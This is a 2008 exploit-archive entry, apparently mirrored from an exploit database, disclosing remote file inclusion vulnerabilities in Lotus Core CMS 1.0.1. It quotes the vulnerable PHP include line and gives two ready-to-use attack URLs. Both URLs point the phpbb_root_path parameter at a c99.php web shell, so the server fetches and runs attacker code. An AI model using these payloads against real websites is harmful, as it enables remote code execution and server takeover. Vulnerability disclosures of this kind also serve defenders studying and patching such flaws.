[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Lotus Core CMS 1.0.1 Remote File Inclusion Vulnerabilities
# Published : 2008-06-19
# Author : Ciph3r
# Previous Title : CaupoShop Classic 1.3 (saArticle[ID]) Remote SQL Injection Vulnerability
# Next Title : AJ Auction Web 2.0 (cate_id) SQL Injection Vulnerability


###############################################################
#
# [phpbb3] Lotus Core CMS v1.0.1 Remote File Include Vulnerabilities 
#
###############################################################
#
# Discovered by : Ciph3r
#
#
# MAIL : Ciph3r_blackhat@yahoo.com
#
#
# SP TANX4 : Iranian hacker & Kurdish Security TEAM 
#
# CLASS : remote
#
# download cms: http://sourceforge.net/project/showfiles.php?group_id=215112
#
################################################################
#
# C0de : 
#                
#                  
#    include($phpbb_root_path . 'includes/bbcode.' . $phpEx);
#       
#        
###############################################################

EXPLOIT :

 
 http://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/index.php?phpbb_root_path=http://127.0.0.1/c99.php?
 
 http://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/error/404.php?phpbb_root_path=http://127.0.0.1/c99.php?


#####################################################################

# www.Syue.com [2008-06-19]